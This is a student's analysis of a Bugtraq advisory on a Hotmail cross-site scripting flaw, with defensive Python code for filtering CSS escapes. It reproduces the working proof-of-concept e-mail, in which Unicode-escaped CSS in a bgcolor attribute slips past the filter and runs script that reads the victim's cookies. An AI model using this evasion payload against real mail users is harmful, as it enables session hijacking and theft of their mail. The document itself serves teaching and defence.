Information Assurance

Richard Frankel



Information Assurance

Bugtraq Analysis

Insufficient Javascript filtering in Hotmail



Link to Bugtraq page

Hotmail is a popular webmail client developed by Microsoft. The security issue I presented on is a cross-site scripting vulnerability: Javascript embedded in an e-mail is not filtered, so arbitrary script runs in the recipient's browser when the message is viewed.

What the problem is
Hotmail does not filter Javascript that is written as Unicode escape sequences (which IE >= 6 decodes) when it is placed, as CSS, in the value of the bgcolor attribute of an e-mail's body tag. When the recipient views the e-mail, Hotmail rewrites the body tag as a div tag and copies the bgcolor value into that div's style attribute, so the escaped javascript: URL ends up in a background-image rule that the browser decodes and runs. Here is the example from Bugtraq:

Attacker sends this:
<html>
<body bgcolor="#CCCCCC; background-image: url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</body>
</html>


Victim receives this:
<div style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</div>

When the victim views the e-mail, the attacker's Javascript runs in his browser in the context of his Hotmail session. Among other things, it can gather the victim's cookies, send e-mail from the victim's account, and download the victim's e-mails and address book entries.


What could have prevented the problem:
Careful and exhaustive filtering/checking by Microsoft, in this case of Unicode-encoded Javascript. The escape sequences have to be decoded before the value is checked, since a filter that only looks at the raw text never sees the string "javascript".


Workarounds:

  • Set your browser to prompt you before Javascript execution (disabling Javascript entirely won't work, since Hotmail itself needs Javascript)
  • Use a browser that does not support Unicode-encoded Javascript
  • Wait for Microsoft to fix this flaw (if they haven't already)


How to prevent this problem in the future:
Developers of any web application that takes user input should carefully examine/filter encoded text.
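To show what "examine/filter encoded text" means in practice for the bgcolor value above, here is an added example (my own code, not Hotmail's or the Bugtraq poster's). It decodes CSS \XXXX escapes the way IE does before checking for a script URL, and contrasts that with a check on the raw text, which the advisory's payload slips past; the strict whitelist at the end is the option I would actually pick for a colour attribute.

```python
import re

# CSS escape: a backslash, 1-6 hex digits, then an optional single whitespace
# character that terminates the escape (CSS 2.1 syntax). This is how the
# \006a\0061... sequence in the Bugtraq payload is read by the browser.
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?')

# URL schemes that must never appear inside a url() of user-supplied CSS.
_ACTIVE_SCHEMES = ("javascript:", "vbscript:")

# The bgcolor value from the advisory above, as a raw string so Python keeps
# the backslashes exactly as they arrive in the e-mail.
BUGTRAQ_BGCOLOR = r"#CCCCCC; background-image: url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029"


def decode_css_escapes(value: str) -> str:
    """Replace every CSS \\XXXX escape with the character it encodes."""
    return _CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def naive_filter_blocks(value: str) -> bool:
    """A check on the raw attribute text only. Escaped text passes straight through."""
    return any(s in value.lower() for s in _ACTIVE_SCHEMES)


def canonical_filter_blocks(value: str) -> bool:
    """Decode escapes first, drop the control/whitespace characters browsers
    ignore inside a scheme name, and only then look for the scheme."""
    decoded = decode_css_escapes(value)
    compact = re.sub(r'[\x00-\x20]', '', decoded).lower()
    return any(s in compact for s in _ACTIVE_SCHEMES)


def safe_bgcolor(value: str) -> str:
    """Strictest option for a colour attribute: accept only a hex colour or a
    plain colour word; anything else is replaced by a neutral default."""
    if re.fullmatch(r'#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20}', value):
        return value
    return "#FFFFFF"


if __name__ == "__main__":
    print("decoded:         ", decode_css_escapes(BUGTRAQ_BGCOLOR))
    print("naive blocks:    ", naive_filter_blocks(BUGTRAQ_BGCOLOR))
    print("canonical blocks:", canonical_filter_blocks(BUGTRAQ_BGCOLOR))
    print("bgcolor kept as: ", safe_bgcolor(BUGTRAQ_BGCOLOR))
```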